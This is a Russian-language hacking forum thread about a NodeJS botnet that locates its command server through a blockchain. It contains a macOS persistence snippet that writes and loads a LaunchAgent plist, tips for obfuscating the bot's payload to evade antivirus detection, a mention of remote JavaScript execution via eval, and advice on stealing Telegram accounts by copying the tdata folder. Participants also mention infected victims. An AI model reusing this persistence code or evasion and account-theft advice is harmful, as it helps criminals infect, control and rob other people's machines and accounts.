Статья [MisakaNetwork] Win Botnet на NodeJS с получением C2 сервера через блокчейн.

[celty]

как в автозапуск добавляешь на macos? при добавлении launch agents попап вылезает

максос не тестил ваще, но на линуксе добавляло, я тестил. Возможности застестить нету на маке). я за всю жизнь даже мак не трогал

Мне ваще гпт этот скрипт выдал, не стал убирать все равно от этого нич не ломается

      } else if (platform === 'darwin') {
          const plistContent = `
  <?xml version="1.0" encoding="UTF-8"?>
  <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
  <plist version="1.0">
  <dict>
      <key>Label</key>
      <string>com.user.startup</string>
      <key>ProgramArguments</key>
      <array>
          <string>${exePath}</string>
      </array>
      <key>RunAtLoad</key>
      <true/>
  </dict>
  </plist>`;
          const plistPath = path.join(os.homedir(), 'Library', 'LaunchAgents', 'com.user.startup.plist');
        
          try {
              fs.writeFileSync(plistPath, plistContent);
              await execAsync(`launchctl load ${plistPath}`);
              console.log('Script successfully added to macOS startup.');
          } catch (error) {
              console.error('Error adding script to macOS startup:', error);
          }

 

[danilarushik]

Кстати, кто занят выбором антивируса, можете вот смотреть на подобные таблицы и кто что детектит, это один из лучших способов выбрать себе антивирь.

хех имхо любой антивирь - это официальный трой в системе, каждый олдскул вроде знает об этом)

 

[danilarushik]

celty отличная работа и интересный подход к реализации продукта!

 

[celty]

celty отличная работа и интересный подход к реализации продукта!

Спасиб

 

[celty]

максос не тестил ваще, но на линуксе добавляло, я тестил. Возможности застестить нету на маке). я за всю жизнь даже мак не трогал

Мне ваще гпт этот скрипт выдал, не стал убирать все равно от этого нич не ломается

      } else if (platform === 'darwin') {
          const plistContent = `
  <?xml version="1.0" encoding="UTF-8"?>
  <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
  <plist version="1.0">
  <dict>
      <key>Label</key>
      <string>com.user.startup</string>
      <key>ProgramArguments</key>
      <array>
          <string>${exePath}</string>
      </array>
      <key>RunAtLoad</key>
      <true/>
  </dict>
  </plist>`;
          const plistPath = path.join(os.homedir(), 'Library', 'LaunchAgents', 'com.user.startup.plist');
       
          try {
              fs.writeFileSync(plistPath, plistContent);
              await execAsync(`launchctl load ${plistPath}`);
              console.log('Script successfully added to macOS startup.');
          } catch (error) {
              console.error('Error adding script to macOS startup:', error);
          }

Попалься какой то бот на маке, и закреп вроде бы работает.

 

[bismum]

Попалься какой то бот на маке, и закреп вроде бы работает.
Посмотреть вложение 97740

Showing this to all who say 'mac is secure' .

 

[celty]

Showing this to all who say 'mac is secure' .

xD

 

[zzzka]

wacatac стал вылезать, как не обфусцируй толку нет

 

[celty]

wacatac стал вылезать, как не обфусцируй толку нет

Ты пробовал обфусцировать билд или код передваваемый от сервера?

 

[celty]

Ты пробовал обфусцировать билд или код передваваемый от сервера?

Если он ругается на код передаваемый от сервера, можно прикрутить чтоб при генераций кода он еще обфуцировалься, вот либа https://www.npmjs.com/package/javascript-obfuscator
ее легко можно прикрутить

 

[zzzka]

Ты пробовал обфусцировать билд или код передваваемый от сервера?

да, я даже написал калькулятор, скомпилировал так же, пакую в архив зип, при скачивании весит детект вакатак либо сабсик по настроении

 

[celty]

да, я даже написал калькулятор, скомпилировал так же, пакую в архив зип, при скачивании весит детект вакатак либо сабсик по настроении

может детект на сам ресурс откуда качаешь?

 

[zzzka]

да, я даже написал калькулятор, скомпилировал так же, пакую в архив зип, при скачивании весит детект вакатак либо сабсик по настроении

причем при прямом переносе на дедик, при сканировании говорит все ок

 

[zzzka]

может детект на сам ресурс откуда качаешь?

не думаю, попробывал траст фо, ничего не помогло, все равно вешает детекты

 

[celty]

не думаю, попробывал траст фо, ничего не помогло, все равно вешает детекты

скинь в лс гляну

 

[fantaser]

Привет. Чет не работают у меня addTask -> Execute JS
Можешь пример как ты пишешь задачу? Самую простую, дальше додумаю)
Спасибо за труды твои)

 

[celty]

Привет. Чет не работают у меня addTask -> Execute JS
Можешь пример как ты пишешь задачу? Самую простую, дальше додумаю)
Спасибо за труды твои)

Убирай коментарий в коде ибо это eval

 

[NEMO]

подскажи а можно тг акк так спиздить ? что если там в тг 2ф стоит

 

[celty]

подскажи а можно тг акк так спиздить ? что если там в тг 2ф стоит

tdata папку только если, но сессия сбиться может